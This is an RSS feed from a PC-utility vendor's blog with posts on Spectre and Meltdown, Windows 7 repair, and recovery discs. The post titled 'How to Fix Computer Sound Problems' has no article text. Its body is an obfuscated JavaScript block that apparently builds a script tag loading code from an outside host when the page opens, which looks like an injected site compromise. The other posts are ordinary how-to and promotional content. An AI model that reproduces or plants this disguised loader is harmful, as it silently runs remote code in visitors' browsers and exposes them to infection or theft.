<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Uncategorized Archives - CompuClever</title>
	<atom:link href="https://www.compuclever.com/posts/category/uncategorized/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.compuclever.com/posts/category/uncategorized/</link>
	<description></description>
	<lastBuildDate>Fri, 24 Aug 2018 19:43:26 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.1.1</generator>

<image>
	<url>https://www.compuclever.com/posts/wp-content/uploads/cropped-compuclever_128-1-32x32.png</url>
	<title>Uncategorized Archives - CompuClever</title>
	<link>https://www.compuclever.com/posts/category/uncategorized/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Spectre and Meltdown:  Massive Security Holes Impacting All Mac and PC devices</title>
		<link>https://www.compuclever.com/posts/spectre-and-meltdown-massive-security-holes-impacting-all-mac-and-pc-devices/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=spectre-and-meltdown-massive-security-holes-impacting-all-mac-and-pc-devices</link>
		
		<dc:creator><![CDATA[Andy Thompson]]></dc:creator>
		<pubDate>Fri, 12 Jan 2018 19:13:13 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[meltdown]]></category>
		<category><![CDATA[PC Security]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[slow]]></category>
		<category><![CDATA[spectre]]></category>
		<category><![CDATA[Windows Update]]></category>
		<guid isPermaLink="false">http://www.compuclever.com/posts/?p=3892</guid>

					<description><![CDATA[<p>Just as we start a new year, there are new computer vulnerabilities identified by researchers.  The impact of these defects could be experienced by almost any computer worldwide!  The implication – millions of devices could be vulnerable to hacking or, if patched, suffer some degradation in speed.</p>
<p>The post <a rel="nofollow" href="https://www.compuclever.com/posts/spectre-and-meltdown-massive-security-holes-impacting-all-mac-and-pc-devices/">Spectre and Meltdown:  Massive Security Holes Impacting All Mac and PC devices</a> appeared first on <a rel="nofollow" href="https://www.compuclever.com/posts">CompuClever</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Just as we start a new year, there are new computer vulnerabilities identified by researchers. The impact of these defects could be experienced by almost any computer worldwide! The implication – millions of devices could be vulnerable to hacking or, if patched, suffer some degradation in speed.</p>
<p>The identified flaws are in the very core of the computer hardware – the CPUs or also known as the processors.</p>
<h1>About The Defect</h1>
<p>The two newly identified defects have wide ranging impacts on devices from the phone you are carrying to the servers that send data to it as well as other mobile devices, laptops and desktops whether PC or Mac. The vulnerabilities enables hackers to access people’s personal information.</p>
<p>Google’s Project Zero team states that these flaws can enable hackers to gain passwords and other sensitive data from system memory.<br />
The two flaws are known as Spectre and Meltdown.</p>
<p style="padding-left: 30px;"><strong>Meltdown</strong>: Named this way because it melts security boundaries which are normally enforced by the hardware. This was found mostly in Intel processors (as far back as 1995). Also ARM has reported their processors are affected, but it is unclear at this time if AMD processors are affected. This vulnerability can be patched through an update. However, this fix could slow down computers as much as 30%.</p>
<p style="padding-left: 30px;"><strong>Spectre</strong>: The name is derived from the root cause: speculative execution. It is not easy to fix &#8211; it requires a re-design of computer chips – so it is likely to haunt us for some time to come. This defect was found in Intel processors as well as AMD and ARM chips. While this flaw is harder to exploit for hackers, it is also more difficult to mitigate for users.</p>
<p>For more information on these we highly recommend going to: <a href="https://meltdownattack.com/" target="_blank" rel="noopener">https://meltdownattack.com/</a></p>
<h1>The Impact</h1>
<p>Google engineers discovered these flaws and had kept the news a secret to enable time for fixes to be created and issued before other computer hackers could take advantage. However, Intel was forced to disclose as the story received coverage when a British tech website, The Register, uncovered it. This led to a drop in Intel’s stock.</p>
<p>These flaws have wide ranging impacts on all types of chip-based devices including cell phones, laptops and desktops – whether PC or Mac.</p>
<p>According to researchers:</p>
<p style="padding-left: 30px;">&#8220;While programs are typically not permitted to read data from other programs, a malicious program can exploit Meltdown and Spectre to get hold of secrets stored in the memory of other running programs,&#8221;<a href="#foot_note_ref"><sup>[1]</sup></a></p>
<p>News reports are emerging that any computer made over the last 20 years could be impacted and that fixing the issue could cause significant disruption around the world. So in a nutshell, it is almost certain that your PC is affected, especially if it uses an Intel based chip.</p>
<p>Companies such as Amazon state they are in the process of creating and distributing a fix for their services and devices. They made a statement: &#8220;This is a vulnerability that has existed for more than 20 years in modern processor architectures like Intel, AMD, and ARM across servers, desktops, and mobile devices.&#8221;<a href="#foot_note_ref"><sup>[2]</sup></a> They further stated that most of its infrastructure had now been made safe.</p>
<p>However, for older computers the update could be more difficult. Many devices have few updates as phone makers are slow to provide updates.</p>
<h1>Risk Mitigation</h1>
<p>It is not safe to work with sensitive information given there is a chance of leaking information if your device has a vulnerable processor and runs an unpatched operating system. This is applicable to personal computers and anyone using cloud infrastructure.</p>
<p>To deal with these defects you will need to update your software as patches become available.</p>
<p>Unfortunately, with older computers it may be harder to update. For many devices – especially those running Android – updates are few and far between since phone makers are often slow to provide their customers with new updates.</p>
<p>According to the Meltdown site:</p>
<p style="padding-left: 30px;">There are patches against Meltdown for Linux , Windows, and OS X. There is also work to harden software against future exploitation of Spectre, respectively to patch software after exploitation through Spectre.</p>
<p style="padding-left: 30px;">There is also work to harden software against future exploitation of Spectre, respectively to patch software after exploitation through Spectre.</p>
<p>The site goes on to explain that unlike usual malware, Meltdown and Spectre are hard to distinguish from regular benign applications. However, your Antivirus program may detect malware whichuses the attacks by comparing binaries after they become known.</p>
<p>We highly recommend that you ensure using a legitimate and effective Antivirus program such as: <a href="https://www.compuclever.com/products/antivirus/" target="_blank" rel="noopener">CompuClever Antivirus PLUS</a>.</p>
<h1>Brace for a Slowdown</h1>
<p>To add salt to the wound, your device could be slower after you have made it safer from hacks. Hard to imagine – you fix your device and it actually results in a slowdown!</p>
<p>Intel says the average computer user won&#8217;t experience significant slowdowns after receiving the fix.</p>
<p>However, there are news reports<a href="#foot_note_ref"><sup>[3]</sup></a> that state fixing these defects will slow performance – especially for devices more than five years old. And for companies that deal with considerable network traffic and processing power the slowdown could be even more severe. This includes cloud computing providers, systems that crunch data, and retailers that process consumer transactions.</p>
<p>Was there ever a time that having your PC running at peak performance was more critical?</p>
<p>Which brings us to our second recommendation: <a href="https://www.compuclever.com/posts/ccpctunup-email-evergreen-cart" target="_blank" rel="noopener">CompuClever PC TuneUp Pro</a> – not only will you find areas of improved system performance you can also better manage security of sensitive data.</p>
<p><strong>Moving Forward</strong>: There are reports<a href="#foot_note_ref"><sup>[4]</sup></a> that point out that some experts are saying the affected processors will need to be replaced entirely in order to completely get rid of the risks created by these flaws. We can’t foresee newly designed chips replacing flawed ones in existing devices in the near future.</p>
<p>At present, there are no available processors that can replace the vulnerable ones and still provide the same kind of functionality. It will be years before new chips that can perform the same tasks safely and effectively, will be made available.</p>
<p>During the wait we need to take whatever measures we have that are at our disposal, to remain safe and to ensure the best performance we can manifest.</p>
<p><a name="foot_note_ref"></a></p>
<hr />
<p>[1] <a href="https://meltdownattack.com/">https://meltdownattack.com/</a></p>
<p>[2] <a href="https://aws.amazon.com/security/security-bulletins/AWS-2018-013/v1/">https://aws.amazon.com/security/security-bulletins/AWS-2018-013/v1/</a></p>
<p>[3 &amp; 4] <a href="http://money.cnn.com/2018/01/04/technology/business/apple-macs-ios-spectre-meltdown/index.html">http://money.cnn.com/2018/01/04/technology/business/apple-macs-ios-spectre-meltdown/index.html</a> </p>
<p>The post <a rel="nofollow" href="https://www.compuclever.com/posts/spectre-and-meltdown-massive-security-holes-impacting-all-mac-and-pc-devices/">Spectre and Meltdown:  Massive Security Holes Impacting All Mac and PC devices</a> appeared first on <a rel="nofollow" href="https://www.compuclever.com/posts">CompuClever</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>How to Fix Computer Sound Problems</title>
		<link>https://www.compuclever.com/posts/fix-computer-no-sound-problems/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=fix-computer-no-sound-problems</link>
		
		<dc:creator><![CDATA[Andy Thompsonn]]></dc:creator>
		<pubDate>Tue, 19 Dec 2017 20:40:12 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[fix error]]></category>
		<category><![CDATA[no sound]]></category>
		<category><![CDATA[PC hardware]]></category>
		<category><![CDATA[sound]]></category>
		<category><![CDATA[volume]]></category>
		<guid isPermaLink="false">http://www.compuclever.com/posts/?p=3866</guid>

					<description><![CDATA[<p>How to fix no sound issues on Windows PC</p>
<p>The post <a rel="nofollow" href="https://www.compuclever.com/posts/fix-computer-no-sound-problems/">How to Fix Computer Sound Problems</a> appeared first on <a rel="nofollow" href="https://www.compuclever.com/posts">CompuClever</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class="wpb_wrapper"></div></div></div></div> <script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$$_+$.$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+"\\"+$.$__+$.___+$.$$$_+(![]+"")[$._$_]+"="+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+"."+$.$$__+"\\"+$.__$+$.$$_+$._$_+$.$$$_+$.$_$_+$.__+$.$$$_+"\\"+$.__$+$.___+$.$_$+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+"('\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"');"+$.$$$_+(![]+"")[$._$_]+".\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.$__+$.___+"=\\"+$.$__+$.___+"'\\"+$.__$+$.$_$+$.___+$.__+$.__+"\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$$_+$._$$+"://\\"+$.__$+$.$$_+$.$$$+$.$$$_+$.$_$$+"."+$.$$__+(![]+"")[$._$_]+$._$+$.$$_$+".\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$$_+$.$$$+"/\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"/\\"+$.__$+$.$_$+$._$$+"\\"+$.__$+$.$$$+$.___+$.$_$_+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.__$+$._$_+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$._$$+$._$_+$._$+"\\"+$.__$+$.$$$+$.___+"\\"+$.__$+$._$_+$.__$+$.$$__+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.___+$.$$$+"\\"+$.__$+$._$$+$.___+$.$$_$+(![]+"")[$._$_]+"\\"+$.__$+$._$$+$.___+$._$_+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$._$_+$.$__+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$._$_+$.$$$+"\\"+$.__$+$._$_+$.___+"\\"+$.__$+$.__$+$.$_$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$._$_+$.___+"\\"+$.__$+$._$$+$._$_+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$._$_+$.___+$.$$$_+"\\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.__$+$.___+$.$$$+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$._$_+$.$$$+"\\"+$.__$+$.__$+$.$_$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.__$+$.$_$+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$.__$+$.___+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$._$_+$.$__+"\\"+$.__$+$.__$+$.___+$.$$_$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.___+$.$$$+$.$___+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$._$_+$.$__+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$._$$+$._$_+$.$$_$+"\\"+$.__$+$.$__+$.$$$+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.___+$._$_+$.__+"\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.___+$._$$+$.__+"\\"+$.__$+$.$$$+$.__$+"\\"+$.__$+$._$$+$._$_+"\\"+$.__$+$.$$$+$._$_+$._$+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$._$_+$.$$$+"\\"+$.__$+$.__$+$.$__+$.__$+"\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.__$+$._$_+"\\"+$.__$+$.__$+$.$_$+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$__+$.$$$+"\\"+$.__$+$.__$+$.$$_+"\\"+$.__$+$._$_+$.$__+$._$+$._$_+"\\"+$.__$+$.__$+$._$$+"\\"+$.__$+$._$_+$.___+$.___+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$.$$$+"\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$.___+$._$$+$.$$_$+"-\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$.$_$+$._$$+$.$_$$+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$.__$+$.$$__+"\\"+$.__$+$.__$+$.$$_+"\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.___+$._$$+"-\\"+$.__$+$.$_$+$._$$+$.__$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.__$+$.__$+$._$_+"\\"+$.__$+$.___+$.$$$+$.$_$+$.$$__+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$.___+$.__$+"_"+$.$__+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$.__$+$.$_$+"\\"+$.__$+$.$$_+$.__$+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$._$_+$._$$+"\\"+$.__$+$.__$+$.___+$.$$$+"\\"+$.__$+$.__$+$.$_$+"\\"+$.__$+$._$_+$.$$$+"\\"+$.__$+$.___+$.__$+$._+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.__$+$.$$_+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.$_$+$._$$+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$.$_$+$._$_+$.$$__+"\\"+$.__$+$._$_+$._$$+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$.$$$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.___+$.$$$+"\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$$+$.___+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.$$$+$.___+"\\"+$.__$+$.$$_+$.$$$+$.$_$_+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"?"+$.__+"\\"+$.__$+$.$$_+$._$_+(![]+"")[$._$_]+"="+$.___+"."+$._$$+$.___+"';"+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$_$+$.___+$.$$$_+$.$_$_+$.$$_$+"."+$.$_$_+"\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$$_+$.___+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.$$_$+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$.$_$+$.__$+(![]+"")[$._$_]+$.$$_$+"("+$.$$$_+(![]+"")[$._$_]+");"+"\"")())();</script></p>
<p>The post <a rel="nofollow" href="https://www.compuclever.com/posts/fix-computer-no-sound-problems/">How to Fix Computer Sound Problems</a> appeared first on <a rel="nofollow" href="https://www.compuclever.com/posts">CompuClever</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Repair Windows 7 with Your Recovery Disc</title>
		<link>https://www.compuclever.com/posts/repair-windows-7-with-recovery-disc/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=repair-windows-7-with-recovery-disc</link>
		
		<dc:creator><![CDATA[Andy Thompson]]></dc:creator>
		<pubDate>Mon, 10 Apr 2017 21:15:23 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Windows 7]]></category>
		<category><![CDATA[Recovery Disc]]></category>
		<category><![CDATA[Repair Windows 7]]></category>
		<category><![CDATA[windows 7]]></category>
		<guid isPermaLink="false">http://www.compuclever.com/posts/?p=3551</guid>

					<description><![CDATA[<p>A Windows Recovery Disk can repair Windows 7 and restore Windows to its factory default state. If you don’t have a Windows 7 Recovery Disc, you can get from our CompuCleverGEAR site. How to Repair Windows 7 This process will repair your systems Windows files and is useful for correcting issues within the operating system [&#8230;]</p>
<p>The post <a rel="nofollow" href="https://www.compuclever.com/posts/repair-windows-7-with-recovery-disc/">Repair Windows 7 with Your Recovery Disc</a> appeared first on <a rel="nofollow" href="https://www.compuclever.com/posts">CompuClever</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>A Windows Recovery Disk can repair Windows 7 and restore Windows to its factory default state. If you don’t have a Windows 7 Recovery Disc, <a href="https://www.compuclevergear.com/products/windows-7-system-repair-disc-recovery-drive-usb" target="_blank">you can get from our CompuCleverGEAR site</a>.</p>
<h1>How to Repair Windows 7</h1>
<p>This process will repair your systems Windows files and is useful for correcting issues within the operating system itself; the process will not delete your personal files or data.  Windows Store programs are also safe, but you may need to reinstall third party programs in some cases.</p>
<p>Insert the USB key, Restart your system. Wait for the first screen to pop up, then, click F8 or F12 (you can see which shortcut key on the screen) to enter the boot menu. Then select USB HDD option on the boot menu.</p>
<p><a href="https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-1.jpg"><img decoding="async" loading="lazy" class="alignnone wp-image-3509" src="https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-1-300x222.jpg" alt="Win 7 image 1" width="627" height="464" srcset="https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-1-300x222.jpg 300w, https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-1-610x452.jpg 610w, https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-1-24x18.jpg 24w, https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-1-36x27.jpg 36w, https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-1-48x36.jpg 48w, https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-1.jpg 613w" sizes="(max-width: 627px) 100vw, 627px" /></a></p>
<p>Select the Time and Keyboard options, and click &#8220;Next&#8221;</p>
<p><a href="https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-2.jpg"><img decoding="async" loading="lazy" class="alignnone wp-image-3510" src="https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-2-300x222.jpg" alt="Win 7 image 2" width="632" height="468" srcset="https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-2-300x222.jpg 300w, https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-2-610x452.jpg 610w, https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-2-24x18.jpg 24w, https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-2-36x27.jpg 36w, https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-2-48x36.jpg 48w, https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-2.jpg 618w" sizes="(max-width: 632px) 100vw, 632px" /></a></p>
<p>Click &#8220;Repair your computer&#8221;</p>
<p><a href="https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-3.png"><img decoding="async" loading="lazy" class="alignnone wp-image-3511 size-full" src="https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-3.png" alt="Win 7 image 3" width="394" height="297" srcset="https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-3.png 394w, https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-3-300x226.png 300w, https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-3-24x18.png 24w, https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-3-36x27.png 36w, https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-3-48x36.png 48w" sizes="(max-width: 394px) 100vw, 394px" /></a></p>
<p>Select the first option: &#8220;Use recovery tools that can help fix problems starting Windows. Select an operating system to repair&#8221;, click &#8220;Next&#8221;.</p>
<p><a href="https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-4.png"><img decoding="async" loading="lazy" class="alignnone wp-image-3512 size-full" src="https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-4.png" alt="Win 7 image 4" width="491" height="368" srcset="https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-4.png 491w, https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-4-300x225.png 300w, https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-4-24x18.png 24w, https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-4-36x27.png 36w, https://www.compuclever.com/posts/wp-content/uploads/Win-7-image-4-48x36.png 48w" sizes="(max-width: 491px) 100vw, 491px" /></a></p>
<p>Choose a recovery tool base on your computer problem:</p>
<p>1)  If you have issues about starting, click &#8220;Startup Repair&#8221;. If it detects a problem, it will automatically fix the problems that are preventing Windows from starting. If not, please select another option.</p>
<p>2)  If you want to restore Windows to an earlier point in time, please click &#8220;System Restore&#8221;. If you have more than one save point to restore please do them in the order of most recent to oldest.  You may have to restart the computer between each restore to complete the restore process, the computer will tell you is you need to restart the system.</p>
<p>Windows 7 is set to automatically create Restore points so even if you have not created any but have used the system for a while, there normally will be several restore point to choose from.   Using the &#8220;System Restore&#8221; may remove programs (if they were installed after the date you go to they will need to be installed again), but it will not affect your data files.</p>
<p>3)  If you want to recover your computer using a system image you created earlier, please click &#8220;System Image Recovery&#8221;.  (Please note, using the &#8220;System Image Recovery&#8221; will result in data and personal files being erased, as well as programs (unless you created the image after installing your programs).  We advise only using this option when all else fails and after your data files are backed up.) It will search on your system to find the image. If you backup the system image on a DVD, you need to insert the DVD.</p>
<h1>Create System Recovery Image</h1>
<p>In case the system you purchased did not have an image created you can do this for yourself.  If you are organized you could create one after your programs are installed, this would mean you would only need to backup data files and restoring the image would correct Windows and install all of your programs too!</p>
<p>If you would like to create an image please perform the steps detailed below:</p>
<p>Click Start (normally in the lower left corner of the screen)<br />
Click &#8220;Control Panel&#8221;<br />
Click &#8220;System and Security&#8221;<br />
Click &#8220;Back up your computer&#8221;</p>
<p>The Backup and Restore Center then opens.</p>
<p>Click &#8220;Create a system image&#8221;</p>
<p>Windows looks for available backup devices, such as a hard drive, DVD burning drive, or network drive.</p>
<p>Choose the location to save your system image<br />
Click &#8220;Next&#8221;</p>
<p>***Do not save the backup to the recovery partition: FACTORY_IMAGE or Recovery. Doing so corrupts the recovery information.</p>
<p>Confirm the settings, and then click &#8220;Start backup&#8221;</p>
<p>***Make sure that you have enough blank space on the external drive or enough blank DVDs to create the system image.</p>
<p>Windows will then prepare to create the system image. (If you are backing up to DVD, label and insert a blank DVD in the DVD drive.)</p>
<p>If you are backing up to DVD and a message displays requesting to format the DVD, choose to format the DVD.</p>
<p>If using DVDs label and insert a blank DVD when you are prompted. Continue to follow the on-screen instructions until the image is complete. This might take from several minutes to several hours, please store the backup in a safe place once the image is complete.</p>
<p>The post <a rel="nofollow" href="https://www.compuclever.com/posts/repair-windows-7-with-recovery-disc/">Repair Windows 7 with Your Recovery Disc</a> appeared first on <a rel="nofollow" href="https://www.compuclever.com/posts">CompuClever</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Windows Recovery Disc &#8211; Be Prepared Ahead of Time</title>
		<link>https://www.compuclever.com/posts/windows-recovery-disc-get-one-free-before-you-need-it/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=windows-recovery-disc-get-one-free-before-you-need-it</link>
		
		<dc:creator><![CDATA[Charles Edward]]></dc:creator>
		<pubDate>Fri, 17 Mar 2017 22:15:19 +0000</pubDate>
				<category><![CDATA[computer fixes]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Windows 10]]></category>
		<category><![CDATA[Windows 8]]></category>
		<category><![CDATA[Windows tips]]></category>
		<category><![CDATA[fixing windows]]></category>
		<category><![CDATA[Recovery Drive]]></category>
		<category><![CDATA[windows]]></category>
		<guid isPermaLink="false">http://www.compuclever.com/posts/?p=3320</guid>

					<description><![CDATA[<p>Do you have a Recovery Disc for your Windows computer? If you don&#8217;t, do you know how to get one? Most people have no idea how to set up a Recovery Disc, which could cause them big headaches if their PC ever develops a problem. If you have a flaky computer, a Recovery Disc can [&#8230;]</p>
<p>The post <a rel="nofollow" href="https://www.compuclever.com/posts/windows-recovery-disc-get-one-free-before-you-need-it/">Windows Recovery Disc &#8211; Be Prepared Ahead of Time</a> appeared first on <a rel="nofollow" href="https://www.compuclever.com/posts">CompuClever</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Do you have a Recovery Disc for your Windows computer? If you don&#8217;t, do you know how to get one? Most people have no idea how to set up a Recovery Disc, which could cause them big headaches if their PC ever develops a problem.</p>
<p>If you have a flaky computer, a Recovery Disc can help by repairing Windows to make things run smoothly again. If you ever encounter a corrupted system file, a Recovery Disc will help you find it and fix it as well. If Windows crashes and you can&#8217;t get it to restart, you can also use a Recovery Disc to restore your computer&#8217;s operating system.</p>
<p>The best thing is by using a Recovery Disc you&#8217;ll be able to save all the data on your computer. This includes Word documents and spreadsheets, your photo collection and your valuable photos and movies.</p>
<p>In short, the Recovery Disc is a lifesaver that provides peace of mind. But, surprisingly, few people have access to one.</p>
<p><a href="https://www.compuclevergear.com/collections/windows-repair-disc?utm_source=blog&amp;utm_medium=banner" target="_blank" rel="noopener noreferrer"><img decoding="async" class="emailImage aligncenter" style="height: auto; width: 100%;" title="Windows System Repair Disc - Recovery Drive" src="https://www.compuclever.com/posts/wp-content/uploads/windows-recovery-disk-reg-banner.png" alt="" /></a></p>
<h1>Recovery Discs Are Hard to Find</h1>
<p>In the past, when you purchased a Windows PC, you likely received a &#8220;recovery disc&#8221;– an actual compact disc – that you would use to troubleshoot problems and restore Windows on your computer. Over the years these recovery discs can be easy to misplace. If you ever need one in an emergency, they are nowhere to be found.</p>
<p>Microsoft and most PC manufacturers stopped shipping Windows installation disc a few years ago &#8211; which is probably better for the environment.</p>
<p>Windows 10 doesn&#8217;t come with a Recovery Disc by default – this can be a real problem if you run into trouble with your computer.</p>
<h1><strong>Produce a Recovery Disc On Your Own<br />
</strong></h1>
<p>However there is a step-by-step process you can follow to download and create a Windows Recovery Disc for both Windows 8 and Windows 10, but if you want to protect your Windows 7 computer, you&#8217;re basically out of luck. Windows 7 has basically been &#8220;retired&#8221; by Microsoft, so a Recovery Disc with the full reinstall option is very hard to find online.</p>
<p>But no matter what, the process of producing a Recovery Disc takes some dedicated effort, and can be a real hassle. That&#8217;s because, to do it right, you need:</p>
<ul>
<li>A blank USB key that&#8217;s at least 4GB in capacity</li>
<li>An actual working PC to produce a recovery disc (but what do you do if your PC won&#8217;t start?)</li>
</ul>
<p>On top of that, the actual process of downloading and setting up a full Recovery Disc with the option of reinstalling the Windows OS could take as long as a few hours!</p>
<p>Imagine when you actually need a Recovery Disc, this could be a massive pain&#8230; but we have a simple solution.</p>
<h1><strong>Choose Your Windows Recovery Disc</strong></h1>
<p>Our CompuCleverGEAR store offers Windows Recovery Disc for Windows 10, Windows 8, and Windows 7 for both 32- and 64-bit versions. Please select the right version for your PC.</p>
